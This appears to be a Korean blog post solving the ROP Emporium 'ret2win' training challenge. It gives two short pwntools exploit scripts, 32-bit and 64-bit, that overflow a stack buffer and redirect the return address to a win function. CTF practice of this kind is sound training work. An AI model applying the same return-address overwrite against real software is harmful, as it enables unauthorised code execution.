상세 컨텐츠

본문 제목

[ROP Emporium] ret2win (32bit, 64bit)

SYSTEM HACKING/CTF, etc

by koharin 2020. 3. 25. 19:42

본문

728x90
반응형

# checksec

 


# exploit code & exploit

 

1. 64bit

 

#!/usr/bin/python 
from pwn import *

p = process("./ret2win")
elf = ELF("./ret2win")
ret2win = elf.symbols['ret2win']

pay = 'A'*0x28 + p64(ret2win)

p.sendlineafter("> ", pay)

p.interactive()

 

2. 32bit

 

#!/usr/bin/python 
from pwn import *

p = process("./ret2win32")
elf = ELF("./ret2win32")
ret2win = elf.symbols['ret2win']

p.sendlineafter("> ", 'A'*(0x28+0x4) + p32(ret2win))

p.interactive()


 

728x90
반응형

관련글 더보기